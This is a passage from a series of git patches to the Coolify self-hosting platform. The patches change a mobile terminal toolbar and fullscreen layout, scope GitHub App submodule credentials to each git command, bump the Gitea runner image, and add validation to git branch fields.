+                    // when calculating rows to keep the prompt above the controls.
+                    const horizontalPadding = 16; // px-2 = 8px * 2 (left + right)
+                    const verticalPadding = 8; // py-1 = 4px * 2 (top + bottom)
+                    const height = terminalHeight - verticalPadding;
+                    const width = terminalWidth - horizontalPadding;
 
                     // Check if dimensions are valid
                     if (height <= 0 || width <= 0) {
diff --git a/resources/views/livewire/project/shared/terminal.blade.php b/resources/views/livewire/project/shared/terminal.blade.php
index c46c5f316..0adb92db6 100644
--- a/resources/views/livewire/project/shared/terminal.blade.php
+++ b/resources/views/livewire/project/shared/terminal.blade.php
@@ -18,10 +18,32 @@
         </div>
     @endif
     <div x-ref="terminalWrapper"
-        :class="fullscreen ? 'fullscreen !bg-black' : 'relative w-full h-full py-4 mx-auto max-h-[510px]'">
+        :class="fullscreen ? 'fixed inset-0 z-[9999] m-0 h-[100dvh] w-screen max-w-none overflow-hidden rounded-none !bg-black p-0' : 'relative w-full h-full py-4 mx-auto max-h-[510px]'">
         <!-- Terminal container -->
         <div id="terminal" wire:ignore
-            :class="fullscreen ? 'px-2 py-1 h-full bg-black' : 'px-2 py-1 rounded-sm bg-black'" x-show="terminalActive">
+            :class="fullscreen ? (mobileToolbarCollapsed ? 'h-[calc(100dvh-3.5rem)] mb-14 px-2 py-1 bg-black' : 'h-[calc(100dvh-6rem)] mb-[6rem] px-2 py-1 bg-black') : 'h-[510px] max-h-[calc(100dvh-10rem)] overflow-hidden px-2 py-1 rounded-sm bg-black'"
+            x-show="terminalActive">
+        </div>
+        <div x-show="terminalActive" x-cloak
+            :class="fullscreen ? 'absolute inset-x-0 bottom-0 z-[9999] px-2 pb-2' : 'relative mt-2'"
+            class="sm:hidden" data-terminal-mobile-toolbar>
+            <div class="mx-auto max-w-3xl rounded-lg border border-white/10 bg-black/90 p-1.5 text-white shadow-lg backdrop-blur">
+                <div class="flex items-center justify-between gap-2">
+                    <span class="px-2 text-[11px] font-medium uppercase tracking-wide text-neutral-400">Terminal keys</span>
+                    <button type="button" class="rounded px-2 py-1 text-xs text-neutral-300 hover:bg-white/10 hover:text-white"
+                        x-on:click="mobileToolbarCollapsed = !mobileToolbarCollapsed; $nextTick(() => resizeTerminal())"
+                        x-text="mobileToolbarCollapsed ? 'Show' : 'Hide'"
+                        aria-label="Toggle mobile terminal toolbar"></button>
+                </div>
+                <div x-show="!mobileToolbarCollapsed" class="mt-1 grid grid-cols-6 gap-1">
+                    <button type="button" class="terminal-mobile-key" x-on:click="sendTerminalControl('arrowUp')" aria-label="Previous command">↑</button>
+                    <button type="button" class="terminal-mobile-key" x-on:click="sendTerminalControl('arrowDown')" aria-label="Next command">↓</button>
+                    <button type="button" class="terminal-mobile-key" x-on:click="sendTerminalControl('arrowLeft')" aria-label="Move cursor left">←</button>
+                    <button type="button" class="terminal-mobile-key" x-on:click="sendTerminalControl('arrowRight')" aria-label="Move cursor right">→</button>
+                    <button type="button" class="terminal-mobile-key" x-on:click="sendTerminalControl('tab')">Tab</button>
+                    <button type="button" class="terminal-mobile-key" x-on:click="sendTerminalControl('escape')">Esc</button>
+                </div>
+            </div>
         </div>
         <button title="Minimize" x-show="fullscreen" class="fixed bg-black/40 top-4 right-6 text-white"
             x-on:click="makeFullscreen"><svg class="w-5 h-5 text-gray-500 hover:text-white bg-black/80"
diff --git a/tests/Feature/RealtimeTerminalPackagingTest.php b/tests/Feature/RealtimeTerminalPackagingTest.php
index ba01deca5..ca1b2dc7a 100644
--- a/tests/Feature/RealtimeTerminalPackagingTest.php
+++ b/tests/Feature/RealtimeTerminalPackagingTest.php
@@ -24,11 +24,12 @@
         ->not->toContain("console.log('[Terminal] WebSocket connection established. Cool cool cool cool cool cool.');");
 });
 
-it('keeps realtime terminal server logging restricted to development environments', function () {
+it('keeps realtime terminal server logging behind the explicit debug flag', function () {
     $terminalServer = file_get_contents(base_path('docker/coolify-realtime/terminal-server.js'));
 
     expect($terminalServer)
-        ->toContain("const terminalDebugEnabled = ['local', 'development'].includes(")
+        ->toContain("const terminalDebugEnabled = ['1', 'true', 'yes'].includes(")
+        ->toContain('process.env.TERMINAL_DEBUG')
         ->toContain('if (!terminalDebugEnabled) {')
         ->not->toContain("console.log('Coolify realtime terminal server listening on port 6002. Let the hacking begin!');");
 });
@@ -104,3 +105,91 @@
         // resetTerminal must NOT call term.reset()/term.clear() any more — those wipe scrollback.
         ->not->toContain("this.term.reset();\n                    this.term.clear();");
 });
+
+it('renders a compact mobile terminal toolbar with shell control keys', function () {
+    $terminalView = file_get_contents(resource_path('views/livewire/project/shared/terminal.blade.php'));
+    $appCss = file_get_contents(resource_path('css/app.css'));
+
+    expect($terminalView)
+        ->toContain('Terminal keys')
+        ->toContain('sm:hidden')
+        ->toContain("sendTerminalControl('arrowUp')")
+        ->toContain("sendTerminalControl('arrowDown')")
+        ->toContain("sendTerminalControl('arrowLeft')")
+        ->toContain("sendTerminalControl('arrowRight')")
+        ->toContain("sendTerminalControl('tab')")
+        ->toContain("sendTerminalControl('escape')")
+        ->not->toContain("sendTerminalControl('ctrlC')")
+        ->not->toContain('pasteFromClipboard()')
+        ->not->toContain('copyTerminalSelection()')
+        ->toContain('mobileToolbarCollapsed')
+        ->toContain("fullscreen ? 'absolute inset-x-0 bottom-0 z-[9999] px-2 pb-2' : 'relative mt-2'")
+        ->toContain('data-terminal-mobile-toolbar')
+        ->and($appCss)
+        ->toContain('.terminal-mobile-key');
+});
+
+it('sends terminal mobile toolbar controls through the websocket', function () {
+    $terminalClient = file_get_contents(resource_path('js/terminal.js'));
+
+    expect($terminalClient)
+        ->toContain('sendTerminalInput(data)')
+        ->toContain('sendTerminalControl(sequence)')
+        ->toContain("arrowUp: '\\x1b[A'")
+        ->toContain("arrowDown: '\\x1b[B'")
+        ->toContain("arrowRight: '\\x1b[C'")
+        ->toContain("arrowLeft: '\\x1b[D'")
+        ->toContain("tab: '\\t'")
+        ->toContain("escape: '\\x1b'")
+        ->toContain("ctrlC: '\\x03'")
+        ->toContain('navigator.clipboard.readText()')
+        ->toContain('navigator.clipboard.writeText(selection)');
+});
+
+it('uses terminal dimensions when resizing so mobile controls do not cover terminal rows', function () {
+    $terminalClient = file_get_contents(resource_path('js/terminal.js'));
+
+    expect($terminalClient)
+        ->toContain("document.getElementById('terminal')")
+        ->toContain('terminalHeight')
+        ->toContain('terminalWidth')
+        ->not->toContain('const wrapperHeight = this.$refs.terminalWrapper.clientHeight;');
+});
+
+it('uses simple fullscreen bottom margin based on mobile toolbar visibility', function () {
+    $terminalClient = file_get_contents(resource_path('js/terminal.js'));
+    $terminalView = file_get_contents(resource_path('views/livewire/project/shared/terminal.blade.php'));
+
+    expect($terminalClient)
+        ->not->toContain('updateFullscreenLayout()')
+        ->not->toContain('terminalFullscreenHeight')
+        ->not->toContain('window.visualViewport?.height')
+        ->and($terminalView)
+        ->toContain("mobileToolbarCollapsed ? 'h-[calc(100dvh-3.5rem)] mb-14 px-2 py-1 bg-black' : 'h-[calc(100dvh-11rem)] mb-[11rem] px-2 py-1 bg-black'")
+        ->toContain("fullscreen ? 'absolute inset-x-0 bottom-0 z-[9999] px-2 pb-2'");
+});
+
+it('resizes after toggling the mobile terminal toolbar', function () {
+    $terminalView = file_get_contents(resource_path('views/livewire/project/shared/terminal.blade.php'));
+
+    expect($terminalView)
+        ->toContain('$nextTick(() => resizeTerminal())');
+});
+
+it('uses fixed viewport positioning for fullscreen terminal instead of inherited container size', function () {
+    $terminalView = file_get_contents(resource_path('views/livewire/project/shared/terminal.blade.php'));
+
+    expect($terminalView)
+        ->toContain('fixed inset-0')
+        ->toContain('h-[100dvh]')
+        ->toContain('w-screen')
+        ->toContain('max-w-none')
+        ->toContain('overflow-hidden');
+});
+
+it('constrains normal terminal height after leaving fullscreen', function () {
+    $terminalView = file_get_contents(resource_path('views/livewire/project/shared/terminal.blade.php'));
+
+    expect($terminalView)
+        ->toContain('h-[510px] max-h-[calc(100dvh-10rem)] overflow-hidden');
+});

From 24fc8db8dbfe77c436b848944c8b34305aaf121e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 1 Jun 2026 10:21:30 +0200
Subject: [PATCH 62/90] fix(terminal): exit fullscreen when PTY exits

Reset fullscreen and mobile toolbar state on PTY exit so the terminal UI returns to its normal layout. Update packaging coverage for the PTY exit behavior and mobile fullscreen height.
---
 resources/js/terminal.js                        |  2 ++
 tests/Feature/RealtimeTerminalPackagingTest.php | 16 +++++++++++++---
 2 files changed, 15 insertions(+), 3 deletions(-)

diff --git a/resources/js/terminal.js b/resources/js/terminal.js
index eedc1faa9..9dc571e26 100644
--- a/resources/js/terminal.js
+++ b/resources/js/terminal.js
@@ -527,6 +527,8 @@ export function initializeTerminalComponent() {
                     // Notify parent component that terminal connection failed
                     this.$wire.dispatch('terminalDisconnected');
                 } else if (event.data === 'pty-exited') {
+                    this.fullscreen = false;
+                    this.mobileToolbarCollapsed = false;
                     this.terminalActive = false;
                     this.resetTerminalSessionCountdown();
                     this.term.reset();
diff --git a/tests/Feature/RealtimeTerminalPackagingTest.php b/tests/Feature/RealtimeTerminalPackagingTest.php
index eed95e342..48072065d 100644
--- a/tests/Feature/RealtimeTerminalPackagingTest.php
+++ b/tests/Feature/RealtimeTerminalPackagingTest.php
@@ -28,8 +28,8 @@
     $terminalServer = file_get_contents(base_path('docker/coolify-realtime/terminal-server.js'));
 
     expect($terminalServer)
-        ->toContain("const terminalDebugEnabled = ['1', 'true', 'yes'].includes(")
-        ->toContain('process.env.TERMINAL_DEBUG')
+        ->toContain('const debugOverride = String(process.env.TERMINAL_DEBUG')
+        ->toContain("['1', 'true', 'yes', 'on'].includes(debugOverride)")
         ->toContain('if (!terminalDebugEnabled) {')
         ->not->toContain("console.log('Coolify realtime terminal server listening on port 6002. Let the hacking begin!');");
 });
@@ -90,6 +90,16 @@
         ->toContain('wire:poll.keep-alive.30s="keepTerminalPageAlive"');
 });
 
+it('exits fullscreen when the terminal process exits', function () {
+    $terminalClient = file_get_contents(resource_path('js/terminal.js'));
+
+    expect($terminalClient)
+        ->toContain("event.data === 'pty-exited'")
+        ->toContain('this.fullscreen = false;
+                    this.mobileToolbarCollapsed = false;
+                    this.terminalActive = false;');
+});
+
 it('replays the last command on reconnect so the PTY respawns automatically', function () {
     $terminalClient = file_get_contents(base_path('resources/js/terminal.js'));
 
@@ -178,7 +188,7 @@
         ->not->toContain('terminalFullscreenHeight')
         ->not->toContain('window.visualViewport?.height')
         ->and($terminalView)
-        ->toContain("mobileToolbarCollapsed ? 'h-[calc(100dvh-3.5rem)] mb-14 px-2 py-1 bg-black' : 'h-[calc(100dvh-11rem)] mb-[11rem] px-2 py-1 bg-black'")
+        ->toContain("mobileToolbarCollapsed ? 'h-[calc(100dvh-3.5rem)] mb-14 px-2 py-1 bg-black' : 'h-[calc(100dvh-6rem)] mb-[6rem] px-2 py-1 bg-black'")
         ->toContain("fullscreen ? 'absolute inset-x-0 bottom-0 z-[9999] px-2 pb-2'");
 });
 

From e7483f591f59d1fd2064d5524e8f5d40d942de64 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 1 Jun 2026 10:54:14 +0200
Subject: [PATCH 63/90] fix(deployments): scope submodule git credentials per
 command

Use per-command git config for GitHub App HTTPS credentials so private submodules authenticate without persisting global git config. Preserve configured git options for checkout, fetch, submodule, and LFS commands, and cover GitLab PR submodule checkout with tests.
---
 app/Models/Application.php                    | 40 +++++++--------
 .../GitHubAppSubmoduleCredentialsTest.php     | 49 +++++++++++++++++++
 tests/Unit/GitSubmoduleCredentialTest.php     | 46 +++++++++++++++++
 3 files changed, 115 insertions(+), 20 deletions(-)
 create mode 100644 tests/Unit/GitHubAppSubmoduleCredentialsTest.php

diff --git a/app/Models/Application.php b/app/Models/Application.php
index 6cbba9cc2..3905281d8 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -1279,11 +1279,12 @@ public function dirOnServer()
         return application_configuration_dir()."/{$this->uuid}";
     }
 
-    public function setGitImportSettings(string $deployment_uuid, string $git_clone_command, bool $public = false, ?string $commit = null, ?string $gitSshCommand = null, ?string $git_ssh_command = null)
+    public function setGitImportSettings(string $deployment_uuid, string $git_clone_command, bool $public = false, ?string $commit = null, ?string $gitSshCommand = null, ?string $git_ssh_command = null, ?string $gitConfigOptions = null)
     {
         $baseDir = $this->generateBaseDir($deployment_uuid);
         $escapedBaseDir = escapeshellarg($baseDir);
         $isShallowCloneEnabled = $this->settings?->is_git_shallow_clone_enabled ?? false;
+        $gitCommand = $gitConfigOptions ? "git {$gitConfigOptions}" : 'git';
 
         $resolvedGitSshCommand = $git_ssh_command ?? $gitSshCommand;
         $sshCommand = $resolvedGitSshCommand
@@ -1301,9 +1302,9 @@ public function setGitImportSettings(string $deployment_uuid, string $git_clone_
             // If shallow clone is enabled and we need a specific commit,
             // we need to fetch that specific commit with depth=1
             if ($isShallowCloneEnabled) {
-                $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && {$sshCommand} git fetch --depth=1 origin {$escapedCommit} && git -c advice.detachedHead=false checkout {$escapedCommit} >/dev/null 2>&1";
+                $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && {$sshCommand} {$gitCommand} fetch --depth=1 origin {$escapedCommit} && {$gitCommand} -c advice.detachedHead=false checkout {$escapedCommit} >/dev/null 2>&1";
             } else {
-                $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && {$sshCommand} git -c advice.detachedHead=false checkout {$escapedCommit} >/dev/null 2>&1";
+                $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && {$sshCommand} {$gitCommand} -c advice.detachedHead=false checkout {$escapedCommit} >/dev/null 2>&1";
             }
         }
         if ($this->settings->is_git_submodules_enabled) {
@@ -1314,10 +1315,10 @@ public function setGitImportSettings(string $deployment_uuid, string $git_clone_
             }
             // Add shallow submodules flag if shallow clone is enabled
             $submoduleFlags = $isShallowCloneEnabled ? '--depth=1' : '';
-            $git_clone_command = "{$git_clone_command} git submodule sync && {$sshCommand} git submodule update --init --recursive {$submoduleFlags}; fi";
+            $git_clone_command = "{$git_clone_command} {$gitCommand} submodule sync && {$sshCommand} {$gitCommand} submodule update --init --recursive {$submoduleFlags}; fi";
         }
         if ($this->settings->is_git_lfs_enabled) {
-            $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && {$sshCommand} git lfs pull";
+            $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && {$sshCommand} {$gitCommand} lfs pull";
         }
 
         return $git_clone_command;
@@ -1559,26 +1560,23 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                     $github_access_token = generateGithubInstallationToken($this->source);
                     $encodedToken = rawurlencode($github_access_token);
 
-                    // Configure git to rewrite URLs with the token so submodules on the same host authenticate correctly.
-                    $escapedTokenUrl = escapeshellarg("{$source_html_url_scheme}://x-access-token:{$encodedToken}@{$source_html_url_host}/");
-                    $escapedHostUrl = escapeshellarg("{$source_html_url_scheme}://{$source_html_url_host}/");
-                    $gitConfigCommand = "git config --global url.{$escapedTokenUrl}.insteadOf {$escapedHostUrl}";
+                    // Rewrite same-host HTTPS URLs only for these git commands so submodules can authenticate without persisting credentials.
+                    $gitConfigOption = '-c '.escapeshellarg("url.{$source_html_url_scheme}://x-access-token:{$encodedToken}@{$source_html_url_host}/.insteadOf={$source_html_url_scheme}://{$source_html_url_host}/");
+                    $git_clone_command = str_replace('git clone', "git {$gitConfigOption} clone", $git_clone_command);
 
                     if ($exec_in_docker) {
-                        $commands->push(executeInDocker($deployment_uuid, $gitConfigCommand));
                         $repoUrl = "$source_html_url_scheme://x-access-token:$encodedToken@$source_html_url_host/{$customRepository}.git";
                         $escapedRepoUrl = escapeshellarg($repoUrl);
                         $git_clone_command = "{$git_clone_command} {$escapedRepoUrl} {$escapedBaseDir}";
                         $fullRepoUrl = $repoUrl;
                     } else {
-                        $commands->push($gitConfigCommand);
                         $repoUrl = "$source_html_url_scheme://x-access-token:$encodedToken@$source_html_url_host/{$customRepository}";
                         $escapedRepoUrl = escapeshellarg($repoUrl);
                         $git_clone_command = "{$git_clone_command} {$escapedRepoUrl} {$escapedBaseDir}";
                         $fullRepoUrl = $repoUrl;
                     }
                     if (! $only_checkout) {
-                        $git_clone_command = $this->setGitImportSettings($deployment_uuid, $git_clone_command, public: false, commit: $commit);
+                        $git_clone_command = $this->setGitImportSettings($deployment_uuid, $git_clone_command, public: false, commit: $commit, gitConfigOptions: $gitConfigOption);
                     }
                     if ($exec_in_docker) {
                         $commands->push(executeInDocker($deployment_uuid, $git_clone_command));
@@ -1589,7 +1587,7 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                 if ($pull_request_id !== 0) {
                     $branch = "pull/{$pull_request_id}/head:$pr_branch_name";
 
-                    $git_checkout_command = $this->buildGitCheckoutCommand($pr_branch_name);
+                    $git_checkout_command = $this->buildGitCheckoutCommand($pr_branch_name, gitConfigOptions: $gitConfigOption ?? null);
                     $escapedPrBranch = escapeshellarg($branch);
                     if ($exec_in_docker) {
                         $commands->push(executeInDocker($deployment_uuid, "cd {$escapedBaseDir} && git fetch origin {$escapedPrBranch} && $git_checkout_command"));
@@ -1614,12 +1612,13 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                     $private_key = base64_encode($private_key);
                     $gitlabPort = $gitlabSource->custom_port ?? 22;
                     $escapedCustomRepository = escapeshellarg($customRepository);
-                    $gitlabSshCommand = "GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$gitlabPort} -o Port={$gitlabPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\"";
-                    $git_clone_command_base = "{$gitlabSshCommand} {$git_clone_command} {$escapedCustomRepository} {$escapedBaseDir}";
+                    $gitlabSshCommand = "ssh -o ConnectTimeout=30 -p {$gitlabPort} -o Port={$gitlabPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa";
+                    $gitlabGitSshCommand = "GIT_SSH_COMMAND=\"{$gitlabSshCommand}\"";
+                    $git_clone_command_base = "{$gitlabGitSshCommand} {$git_clone_command} {$escapedCustomRepository} {$escapedBaseDir}";
                     if ($only_checkout) {
                         $git_clone_command = $git_clone_command_base;
                     } else {
-                        $git_clone_command = $this->setGitImportSettings($deployment_uuid, $git_clone_command_base, commit: $commit, git_ssh_command: $gitlabSshCommand);
+                        $git_clone_command = $this->setGitImportSettings($deployment_uuid, $git_clone_command_base, commit: $commit, gitSshCommand: $gitlabSshCommand);
                     }
                     if ($exec_in_docker) {
                         $commands = collect([
@@ -1642,7 +1641,7 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                         } else {
                             $commands->push("echo 'Checking out $branch'");
                         }
-                        $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$gitlabPort} -o Port={$gitlabPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" git fetch origin $branch && ".$this->buildGitCheckoutCommand($pr_branch_name);
+                        $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && {$gitlabGitSshCommand} git fetch origin $branch && ".$this->buildGitCheckoutCommand($pr_branch_name, $gitlabSshCommand);
                     }
 
                     if ($exec_in_docker) {
@@ -2024,14 +2023,15 @@ public function fqdns(): Attribute
         );
     }
 
-    protected function buildGitCheckoutCommand($target, ?string $gitSshCommand = null): string
+    protected function buildGitCheckoutCommand($target, ?string $gitSshCommand = null, ?string $gitConfigOptions = null): string
     {
         $escapedTarget = escapeshellarg($target);
-        $command = "git checkout {$escapedTarget}";
+        $gitCommand = $gitConfigOptions ? "git {$gitConfigOptions}" : 'git';
+        $command = "{$gitCommand} checkout {$escapedTarget}";
 
         if ($this->settings->is_git_submodules_enabled) {
             $sshCommand = $gitSshCommand ?? 'ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null';
-            $command .= " && GIT_SSH_COMMAND=\"{$sshCommand}\" git submodule update --init --recursive";
+            $command .= " && GIT_SSH_COMMAND=\"{$sshCommand}\" {$gitCommand} submodule update --init --recursive";
         }
 
         return $command;
diff --git a/tests/Unit/GitHubAppSubmoduleCredentialsTest.php b/tests/Unit/GitHubAppSubmoduleCredentialsTest.php
new file mode 100644
index 000000000..48f18d2a5
--- /dev/null
+++ b/tests/Unit/GitHubAppSubmoduleCredentialsTest.php
@@ -0,0 +1,49 @@
+<?php
+
+namespace App\Models {
+    function generateGithubInstallationToken(GithubApp $source): string
+    {
+        return 'review token/with+symbols';
+    }
+}
+
+namespace {
+    use App\Models\Application;
+    use App\Models\ApplicationSetting;
+    use App\Models\GithubApp;
+
+    test('private github app submodule credentials use per command git config', function () {
+        $application = new Application;
+        $application->forceFill([
+            'uuid' => 'test-app-uuid',
+            'git_repository' => 'coollabsio/private-app',
+            'git_branch' => 'main',
+            'git_commit_sha' => 'HEAD',
+        ]);
+
+        $settings = new ApplicationSetting;
+        $settings->is_git_shallow_clone_enabled = false;
+        $settings->is_git_submodules_enabled = true;
+        $settings->is_git_lfs_enabled = false;
+        $application->setRelation('settings', $settings);
+
+        $source = new GithubApp;
+        $source->forceFill([
+            'html_url' => 'https://github.com',
+            'api_url' => 'https://api.github.com',
+            'is_public' => false,
+        ]);
+        $application->setRelation('source', $source);
+
+        $result = $application->generateGitImportCommands(
+            deployment_uuid: 'test-deployment',
+            exec_in_docker: false,
+        );
+
+        expect($result['commands'])
+            ->not->toContain('git config --global')
+            ->toContain("git -c 'url.https://x-access-token:review%20token%2Fwith%2Bsymbols@github.com/.insteadOf=https://github.com/' clone --recurse-submodules -b 'main'")
+            ->toContain("git -c 'url.https://x-access-token:review%20token%2Fwith%2Bsymbols@github.com/.insteadOf=https://github.com/' submodule sync")
+            ->toContain("git -c 'url.https://x-access-token:review%20token%2Fwith%2Bsymbols@github.com/.insteadOf=https://github.com/' submodule update --init --recursive");
+    });
+}
diff --git a/tests/Unit/GitSubmoduleCredentialTest.php b/tests/Unit/GitSubmoduleCredentialTest.php
index 1adaf735f..5ac5c501a 100644
--- a/tests/Unit/GitSubmoduleCredentialTest.php
+++ b/tests/Unit/GitSubmoduleCredentialTest.php
@@ -2,6 +2,8 @@
 
 use App\Models\Application;
 use App\Models\ApplicationSetting;
+use App\Models\GitlabApp;
+use App\Models\PrivateKey;
 
 describe('Git submodule credential propagation', function () {
     beforeEach(function () {
@@ -119,4 +121,48 @@
             ->toContain("git checkout 'main'")
             ->not->toContain('submodule');
     });
+
+    test('generateGitImportCommands uses GitLab private key for PR submodule checkout', function () {
+        $settings = new ApplicationSetting;
+        $settings->is_git_shallow_clone_enabled = false;
+        $settings->is_git_submodules_enabled = true;
+        $settings->is_git_lfs_enabled = false;
+
+        $privateKey = Mockery::mock(PrivateKey::class)->makePartial();
+        $privateKey->shouldReceive('getAttribute')->with('private_key')->andReturn('fake-private-key');
+
+        $gitlabSource = Mockery::mock(GitlabApp::class)->makePartial();
+        $gitlabSource->shouldReceive('getMorphClass')->andReturn(GitlabApp::class);
+        $gitlabSource->shouldReceive('getAttribute')->with('privateKey')->andReturn($privateKey);
+        $gitlabSource->shouldReceive('getAttribute')->with('custom_port')->andReturn(22);
+        $gitlabSource->shouldReceive('getAttribute')->with('html_url')->andReturn('https://gitlab.com');
+
+        $application = Mockery::mock(Application::class)->makePartial();
+        $application->git_branch = 'main';
+        $application->git_commit_sha = 'HEAD';
+        $application->setRelation('settings', $settings);
+        $application->source = $gitlabSource;
+        $application->shouldReceive('deploymentType')->andReturn('source');
+        $application->shouldReceive('customRepository')->andReturn([
+            'repository' => 'git@gitlab.com:user/repo.git',
+            'port' => 22,
+        ]);
+        $application->shouldReceive('getAttribute')->with('source')->andReturn($gitlabSource);
+
+        $result = $application->generateGitImportCommands(
+            deployment_uuid: 'test-uuid',
+            pull_request_id: 123,
+            git_type: 'gitlab',
+            exec_in_docker: false,
+        );
+
+        $sshCommand = 'ssh -o ConnectTimeout=30 -p 22 -o Port=22 -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa';
+
+        expect($result['commands'])
+            ->toContain('GIT_SSH_COMMAND="'.$sshCommand.'" git fetch origin merge-requests/123/head:pr-123-coolify')
+            ->toContain("git checkout 'pr-123-coolify'")
+            ->toContain('GIT_SSH_COMMAND="'.$sshCommand.'" git submodule update --init --recursive')
+            ->not->toContain('GIT_SSH_COMMAND="ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null" git submodule update --init --recursive');
+    });
+
 });

From 27b33b7b363ae177a6eb126c4d8078916de8d087 Mon Sep 17 00:00:00 2001
From: Tyler Westbrook <git@twestbrook.com>
Date: Mon, 1 Jun 2026 07:54:27 -0500
Subject: [PATCH 64/90] Chore(Update): Update Gitea runner image to version
 1.0.7

Update version of gitea runner from 1.0.6 to 1.0.7
---
 templates/compose/gitea-runner.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/templates/compose/gitea-runner.yaml b/templates/compose/gitea-runner.yaml
index 4cf5ac503..bc6b4bd77 100644
--- a/templates/compose/gitea-runner.yaml
+++ b/templates/compose/gitea-runner.yaml
@@ -6,7 +6,7 @@
 
 services:
   runner:
-    image: 'docker.io/gitea/runner:1.0.6'
+    image: 'docker.io/gitea/runner:1.0.7'
     environment:
       - 'GITEA_INSTANCE_URL=${GITEA_INSTANCE_URL}'
       - 'GITEA_RUNNER_REGISTRATION_TOKEN=${GITEA_RUNNER_REGISTRATION_TOKEN}'

From 2bb07bbe9e75ba50b27703ff14e9894f92bdd376 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 1 Jun 2026 15:13:04 +0200
Subject: [PATCH 65/90] fix: validate application branch updates

---
 app/Livewire/Project/Application/General.php  |  3 +-
 app/Livewire/Project/Application/Source.php   |  3 +-
 bootstrap/helpers/api.php                     | 30 +++++++------
 .../Feature/CommandInjectionSecurityTest.php  | 44 +++++++++++++++++++
 4 files changed, 64 insertions(+), 16 deletions(-)

diff --git a/app/Livewire/Project/Application/General.php b/app/Livewire/Project/Application/General.php
index 258b54eed..69240337f 100644
--- a/app/Livewire/Project/Application/General.php
+++ b/app/Livewire/Project/Application/General.php
@@ -5,6 +5,7 @@
 use App\Actions\Application\GenerateConfig;
 use App\Jobs\ApplicationDeploymentJob;
 use App\Models\Application;
+use App\Rules\ValidGitBranch;
 use App\Support\ValidationPatterns;
 use Illuminate\Auth\Access\AuthorizationException;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
@@ -144,7 +145,7 @@ protected function rules(): array
             'description' => ValidationPatterns::descriptionRules(),
             'fqdn' => 'nullable',
             'gitRepository' => 'required',
-            'gitBranch' => 'required',
+            'gitBranch' => ['required', 'string', new ValidGitBranch],
             'gitCommitSha' => ['nullable', 'string', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._\-\/]*$/'],
             'installCommand' => ValidationPatterns::shellSafeCommandRules(),
             'buildCommand' => ValidationPatterns::shellSafeCommandRules(),
diff --git a/app/Livewire/Project/Application/Source.php b/app/Livewire/Project/Application/Source.php
index f14689ee0..3ee5919fe 100644
--- a/app/Livewire/Project/Application/Source.php
+++ b/app/Livewire/Project/Application/Source.php
@@ -6,6 +6,7 @@
 use App\Models\GithubApp;
 use App\Models\GitlabApp;
 use App\Models\PrivateKey;
+use App\Rules\ValidGitBranch;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Attributes\Locked;
 use Livewire\Attributes\Validate;
@@ -29,7 +30,7 @@ class Source extends Component
     #[Validate(['required', 'string'])]
     public string $gitRepository;
 
-    #[Validate(['required', 'string'])]
+    #[Validate(['required', 'string', new ValidGitBranch])]
     public string $gitBranch;
 
     #[Validate(['nullable', 'string', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._\-\/]*$/'])]
diff --git a/bootstrap/helpers/api.php b/bootstrap/helpers/api.php
index 4b76200d2..47cca8519 100644
--- a/bootstrap/helpers/api.php
+++ b/bootstrap/helpers/api.php
@@ -3,6 +3,8 @@
 use App\Enums\BuildPackTypes;
 use App\Enums\RedirectTypes;
 use App\Enums\StaticImageTypes;
+use App\Rules\ValidGitBranch;
+use App\Support\ValidationPatterns;
 use Illuminate\Database\Eloquent\Collection;
 use Illuminate\Http\Request;
 use Illuminate\Validation\Rule;
@@ -83,7 +85,7 @@ function sharedDataApplications()
 {
     return [
         'git_repository' => 'string',
-        'git_branch' => 'string',
+        'git_branch' => ['string', new ValidGitBranch],
         'build_pack' => Rule::enum(BuildPackTypes::class),
         'is_static' => 'boolean',
         'is_spa' => 'boolean',
@@ -95,14 +97,14 @@ function sharedDataApplications()
         'git_commit_sha' => ['string', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._\-\/]*$/'],
         'docker_registry_image_name' => 'string|nullable',
         'docker_registry_image_tag' => 'string|nullable',
-        'install_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
-        'build_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
-        'start_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
+        'install_command' => ValidationPatterns::shellSafeCommandRules(),
+        'build_command' => ValidationPatterns::shellSafeCommandRules(),
+        'start_command' => ValidationPatterns::shellSafeCommandRules(),
         'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/',
